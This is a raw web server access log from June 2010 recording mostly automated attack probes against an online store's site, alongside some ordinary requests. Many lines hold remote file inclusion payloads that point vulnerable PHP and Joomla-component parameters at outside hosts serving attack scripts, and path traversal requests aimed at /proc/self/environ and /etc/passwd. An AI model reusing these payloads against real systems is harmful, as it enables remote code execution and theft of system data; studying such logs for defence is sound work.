178.63.49.141 - - [21/Jun/2010:01:57:04 -0400] "GET /logs/access_log.Q109110500 HTTP/1.1" 200 6852448 "http://www.aceonlinestore.com/logs/access_log.Q109110500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:57:04 -0400] "GET /logs/access_log.Q109110700 HTTP/1.1" 200 2632711 "http://www.aceonlinestore.com/logs/access_log.Q109110700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
67.59.156.163 - - [21/Jun/2010:01:58:10 -0400] "GET /logs/access_log.Q109051700/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:01:58:10 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:01:58:10 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
82.76.12.197 - - [21/Jun/2010:01:58:11 -0400] "GET /logs/access_log.Q110052800/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.831"
64.237.56.50 - - [21/Jun/2010:01:58:17 -0400] "GET //*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 204 "-" "libwww-perl/5.810"
85.235.154.15 - - [21/Jun/2010:01:58:37 -0400] "GET /logs/access_log.Q109080600%20%20/errors.php?error=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:01:58:38 -0400] "GET /logs/access_log.Q109080600%20%20/errors.php?error=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.237.56.50 - - [21/Jun/2010:01:58:41 -0400] "GET //*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 204 "-" "libwww-perl/5.810"
64.237.56.50 - - [21/Jun/2010:01:58:44 -0400] "GET /logs/access_log.Q109060500//*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 231 "-" "libwww-perl/5.810"
64.237.56.50 - - [21/Jun/2010:01:58:44 -0400] "GET //*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 204 "-" "libwww-perl/5.810"
64.237.56.50 - - [21/Jun/2010:01:58:44 -0400] "GET /logs//*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "libwww-perl/5.810"
64.237.56.50 - - [21/Jun/2010:01:58:44 -0400] "GET /logs/access_log.Q109060400//*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 231 "-" "libwww-perl/5.810"
67.59.156.163 - - [21/Jun/2010:01:58:45 -0400] "GET /errors.php?error=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:01:58:45 -0400] "GET /logs/errors.php?error=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:01:58:47 -0400] "GET /logs/access_log.Q109120200/errors.php?error=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.237.56.50 - - [21/Jun/2010:01:58:47 -0400] "GET /logs//*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "libwww-perl/5.810"
64.237.56.50 - - [21/Jun/2010:01:58:47 -0400] "GET //*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 204 "-" "libwww-perl/5.810"
64.237.56.50 - - [21/Jun/2010:01:58:51 -0400] "GET //*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 204 "-" "libwww-perl/5.810"
85.235.154.15 - - [21/Jun/2010:01:58:52 -0400] "GET /logs/access_log.Q109051600%20%20/errors.php?error=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.237.56.50 - - [21/Jun/2010:01:58:53 -0400] "GET /logs/access_log.Q109060500//*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 231 "-" "libwww-perl/5.810"
64.237.56.50 - - [21/Jun/2010:01:58:53 -0400] "GET //*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 204 "-" "libwww-perl/5.810"
64.237.56.50 - - [21/Jun/2010:01:58:54 -0400] "GET /logs//*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "libwww-perl/5.810"
85.235.154.15 - - [21/Jun/2010:01:58:56 -0400] "GET /logs/access_log.Q109051600%20%20/errors.php?error=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:01:59:03 -0400] "GET /errors.php?error=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:01:59:04 -0400] "GET /logs/access_log.Q109080600%20%20/errors.php?error=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
178.63.49.141 - - [21/Jun/2010:01:58:05 -0400] "GET /logs/access_log.Q109111400 HTTP/1.1" 200 2742027 "http://www.aceonlinestore.com/logs/access_log.Q109111400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:58:05 -0400] "GET /logs/access_log.Q109112300 HTTP/1.1" 200 5876924 "http://www.aceonlinestore.com/logs/access_log.Q109112300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:58:05 -0400] "GET /logs/access_log.Q109112200 HTTP/1.1" 200 2187328 "http://www.aceonlinestore.com/logs/access_log.Q109112200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:58:05 -0400] "GET /logs/access_log.Q109111800 HTTP/1.1" 200 8619981 "http://www.aceonlinestore.com/logs/access_log.Q109111800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:58:05 -0400] "GET /logs/access_log.Q109111700 HTTP/1.1" 200 6954149 "http://www.aceonlinestore.com/logs/access_log.Q109111700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:58:05 -0400] "GET /logs/access_log.Q109112000 HTTP/1.1" 200 4313908 "http://www.aceonlinestore.com/logs/access_log.Q109112000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:58:05 -0400] "GET /logs/access_log.Q109111500 HTTP/1.1" 200 3171054 "http://www.aceonlinestore.com/logs/access_log.Q109111500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:58:05 -0400] "GET /logs/access_log.Q109112100 HTTP/1.1" 200 1979338 "http://www.aceonlinestore.com/logs/access_log.Q109112100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:58:05 -0400] "GET /logs/access_log.Q109111600 HTTP/1.1" 200 4492388 "http://www.aceonlinestore.com/logs/access_log.Q109111600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
67.59.156.163 - - [21/Jun/2010:01:59:05 -0400] "GET /logs/errors.php?error=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
178.63.49.141 - - [21/Jun/2010:01:58:05 -0400] "GET /logs/access_log.Q109111900 HTTP/1.1" 200 4234170 "http://www.aceonlinestore.com/logs/access_log.Q109111900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
67.59.156.163 - - [21/Jun/2010:01:59:07 -0400] "GET /logs/access_log.Q109120200/errors.php?error=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:01:59:09 -0400] "GET /logs/access_log.Q109080600%20%20/errors.php?error=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:01:59:12 -0400] "GET /logs/errors.php?error=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:01:59:12 -0400] "GET /logs/access_log.Q109120200/errors.php?error=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:01:59:12 -0400] "GET /errors.php?error=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
67.195.114.223 - - [21/Jun/2010:01:58:12 -0400] "GET /logs/error_log.Q109080200 HTTP/1.0" 200 2484946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
85.235.154.15 - - [21/Jun/2010:01:59:19 -0400] "GET /logs/access_log.Q109051600%20%20/errors.php?error=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:01:59:24 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:01:59:24 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:01:59:25 -0400] "GET /logs/access_log.Q109051600%20%20/errors.php?error=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:01:59:25 -0400] "GET /logs/access_log.Q109112500%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:01:59:25 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:01:59:25 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:01:59:25 -0400] "GET /logs/access_log.Q109112500%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:01:59:27 -0400] "GET /logs/access_log.Q110052500%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:01:59:27 -0400] "GET /logs/access_log.Q110052500%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
95.215.0.123 - - [21/Jun/2010:01:59:36 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.seekalodge.com/language/pdf_fonts/myid.jpg? HTTP/1.1" 200 452 "-" "libwww-perl/5.834"
94.228.131.90 - - [21/Jun/2010:01:59:46 -0400] "GET /logs/access_log.Q110060700%20%20/?option=com_gcalendar&controller=http://ulala2.fileave.com/Ckrid1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
178.63.49.141 - - [21/Jun/2010:01:59:05 -0400] "GET /logs/access_log.Q109112100 HTTP/1.1" 200 1979338 "http://www.aceonlinestore.com/logs/access_log.Q109112100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
82.76.12.197 - - [21/Jun/2010:02:00:00 -0400] "GET /logs/error_log.Q110053100/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 224 "-" "libwww-perl/5.831"
194.108.112.112 - - [21/Jun/2010:02:00:15 -0400] "GET /logs/error_log.Q109061700//adxmlrpc.php HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
194.108.112.112 - - [21/Jun/2010:02:00:15 -0400] "GET //adxmlrpc.php HTTP/1.1" 404 211 "-" "libwww-perl/5.79"
194.108.112.112 - - [21/Jun/2010:02:00:16 -0400] "GET /logs//adxmlrpc.php HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
82.76.12.197 - - [21/Jun/2010:02:00:20 -0400] "GET /logs/access_log.Q110061100/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.831"
82.76.12.197 - - [21/Jun/2010:02:00:23 -0400] "GET /logs/access_log.Q110060700/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.831"
82.76.12.197 - - [21/Jun/2010:02:00:23 -0400] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.831"
82.76.12.197 - - [21/Jun/2010:02:00:23 -0400] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 55286 "-" "libwww-perl/5.831"
64.237.56.50 - - [21/Jun/2010:02:00:31 -0400] "GET /logs/access_log.Q109060400//*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 231 "-" "libwww-perl/5.810"
64.237.56.50 - - [21/Jun/2010:02:00:35 -0400] "GET /logs/error_log.Q109060400//*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 230 "-" "libwww-perl/5.810"
64.237.56.50 - - [21/Jun/2010:02:00:35 -0400] "GET //*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 204 "-" "libwww-perl/5.810"
64.237.56.50 - - [21/Jun/2010:02:00:36 -0400] "GET /logs//*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "libwww-perl/5.810"
64.237.56.50 - - [21/Jun/2010:02:00:41 -0400] "GET /logs/access_log.Q109060500//*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 231 "-" "libwww-perl/5.810"
67.59.156.163 - - [21/Jun/2010:02:00:44 -0400] "GET /logs/access_log.Q109080600%20%20/errors.php?error=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
82.76.12.197 - - [21/Jun/2010:02:00:49 -0400] "GET /logs/access_log.Q110061500/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.831"
178.63.49.141 - - [21/Jun/2010:01:59:53 -0400] "GET /logs/access_log.Q109120200 HTTP/1.1" 200 5222116 "http://www.aceonlinestore.com/logs/access_log.Q109120200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:59:53 -0400] "GET /logs/access_log.Q109120100 HTTP/1.1" 200 5619732 "http://www.aceonlinestore.com/logs/access_log.Q109120100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:59:53 -0400] "GET /logs/access_log.Q109113000 HTTP/1.1" 200 4068743 "http://www.aceonlinestore.com/logs/access_log.Q109113000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:59:53 -0400] "GET /logs/access_log.Q109120300 HTTP/1.1" 200 5973546 "http://www.aceonlinestore.com/logs/access_log.Q109120300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:59:53 -0400] "GET /logs/access_log.Q109112800 HTTP/1.1" 200 1597252 "http://www.aceonlinestore.com/logs/access_log.Q109112800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:59:53 -0400] "GET /logs/access_log.Q109112700 HTTP/1.1" 200 2246310 "http://www.aceonlinestore.com/logs/access_log.Q109112700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:59:53 -0400] "GET /logs/access_log.Q109112900 HTTP/1.1" 200 2295103 "http://www.aceonlinestore.com/logs/access_log.Q109112900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:59:53 -0400] "GET /logs/access_log.Q109112500 HTTP/1.1" 200 3564565 "http://www.aceonlinestore.com/logs/access_log.Q109112500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:59:53 -0400] "GET /logs/access_log.Q109112600 HTTP/1.1" 200 1922305 "http://www.aceonlinestore.com/logs/access_log.Q109112600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:59:53 -0400] "GET /logs/access_log.Q109112400 HTTP/1.1" 200 5106376 "http://www.aceonlinestore.com/logs/access_log.Q109112400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
67.59.156.163 - - [21/Jun/2010:02:01:05 -0400] "GET /logs/access_log.Q109080600%20%20/errors.php?error=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
194.42.16.25 - - [21/Jun/2010:02:01:08 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
194.42.16.25 - - [21/Jun/2010:02:01:08 -0400] "GET /logs/access_log.Q109082000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
194.42.16.25 - - [21/Jun/2010:02:01:08 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
62.44.82.118 - - [21/Jun/2010:02:01:10 -0400] "GET //*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 204 "-" "libwww-perl/5.803"
194.42.16.25 - - [21/Jun/2010:02:01:13 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
194.42.16.25 - - [21/Jun/2010:02:01:14 -0400] "GET /logs/access_log.Q109082000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
194.42.16.25 - - [21/Jun/2010:02:01:14 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:02:01:14 -0400] "GET /logs/access_log.Q109080600%20%20/errors.php?error=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
194.42.16.25 - - [21/Jun/2010:02:01:16 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
194.42.16.25 - - [21/Jun/2010:02:01:16 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
194.42.16.25 - - [21/Jun/2010:02:01:16 -0400] "GET /logs/access_log.Q109082000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:02:01:23 -0400] "GET /logs/access_log.Q109080600%20%20/errors.php?error=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:02:01:36 -0400] "GET /logs/access_log.Q109051600%20%20/errors.php?error=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
82.39.188.43 - - [21/Jun/2010:02:01:43 -0400] "GET /logs/error_log.Q109061700//adxmlrpc.php HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
82.39.188.43 - - [21/Jun/2010:02:01:43 -0400] "GET //adxmlrpc.php HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
82.39.188.43 - - [21/Jun/2010:02:01:43 -0400] "GET /logs//adxmlrpc.php HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
67.59.156.163 - - [21/Jun/2010:02:01:54 -0400] "GET /logs/access_log.Q109051600%20%20/errors.php?error=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.216.242.123 - - [21/Jun/2010:02:01:55 -0400] "GET ////////?mosConfig_absolute_path=http://www.annapurnaeverest.com/language/en-US/byz9991.txt??? HTTP/1.1" 200 458 "-" "Mozilla/5.0"
209.216.242.123 - - [21/Jun/2010:02:01:55 -0400] "GET /logs////////?mosConfig_absolute_path=http://www.annapurnaeverest.com/language/en-US/byz9991.txt??? HTTP/1.1" 200 55297 "-" "Mozilla/5.0"
216.17.105.143 - - [21/Jun/2010:02:01:57 -0400] "GET /logs/access_log.Q110060700/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.830"
67.59.156.163 - - [21/Jun/2010:02:02:12 -0400] "GET /logs/access_log.Q109051600%20%20/errors.php?error=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.216.242.123 - - [21/Jun/2010:02:02:20 -0400] "GET /logs/access_log.Q110010400%20%20////////?mosConfig_absolute_path=http://www.annapurnaeverest.com/language/en-US/byz9991.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:02:02:24 -0400] "GET /logs/access_log.Q109051600%20%20/errors.php?error=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
194.108.112.112 - - [21/Jun/2010:02:02:33 -0400] "GET /logs/access_log.Q109061700//adxmlrpc.php HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
85.33.247.43 - - [21/Jun/2010:02:02:43 -0400] "GET /logs/error_log.Q110061600/index.php?option=com_wmi&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
85.33.247.43 - - [21/Jun/2010:02:02:47 -0400] "GET /index.php?option=com_wmi&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
85.33.247.43 - - [21/Jun/2010:02:02:51 -0400] "GET /logs/index.php?option=com_wmi&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
208.113.148.15 - - [21/Jun/2010:02:03:30 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
208.113.148.15 - - [21/Jun/2010:02:03:30 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
208.113.148.15 - - [21/Jun/2010:02:03:30 -0400] "GET /logs/access_log.Q109082000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
119.193.103.190 - - [21/Jun/2010:02:03:34 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.5; OfficeLivePatch.1.3)"
119.193.103.190 - - [21/Jun/2010:02:03:34 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.5; OfficeLivePatch.1.3)"
119.193.103.190 - - [21/Jun/2010:02:03:36 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.5; OfficeLivePatch.1.3)"
119.193.103.190 - - [21/Jun/2010:02:03:36 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.5; OfficeLivePatch.1.3)"
119.193.103.190 - - [21/Jun/2010:02:03:37 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.5; OfficeLivePatch.1.3)"
119.193.103.190 - - [21/Jun/2010:02:03:37 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.5; OfficeLivePatch.1.3)"
